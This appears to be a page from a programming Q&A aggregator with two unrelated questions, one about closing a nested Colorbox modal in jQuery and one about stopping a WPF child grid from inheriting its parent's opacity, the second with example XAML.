Greetings. I have a need to have a 'child' modal opended from a colorbox modal. Form - anchor - opens modal ('parent') - model has another anchor - open modal 'child' The problem is that when the 'child' modal closes via the $.fn.colorbox.close() Method this seems to close all the colorbox modal windows. I just need to close the 'child' (the second opened from the first modal), after I set a hidden on the 'parent' modal. Any suggestions on how to close just the second colorbox window? Using jQuery 1.3.2 and Colorbox 1.3.5

  • How do you override the opacity of a parent control in WPF?

    - by Metro Smurf
When you set the opacity on a Grid in WPF, all the child elements appear to inherit its Opacity. How can you have a child element not inherit the parent's opacity? For example, the following parent grid has one child grid in the middle with a background set to red, but the background appears pinkish because of the parent's opacity. I'd like the child grid to have a solid color, non-transparent background: <Grid x:Name="LayoutRoot"> <Grid Background="Black" Opacity="0.5"> <Grid.RowDefinitions> <RowDefinition Height="0.333*"/> <RowDefinition Height="0.333*"/> <RowDefinition Height="0.333*"/> </Grid.RowDefinitions> <Grid.ColumnDefinitions> <ColumnDefinition Width="0.333*"/> <ColumnDefinition Width="0.333*"/> <ColumnDefinition Width="0.333*"/> </Grid.ColumnDefinitions> <-- how do you make this child grid's background solid red and not inherit the Opacity/Transparency of the parent grid? --> <Grid Grid.Column="1" Grid.Row="1" Background="Red"/> </Grid> </Grid>
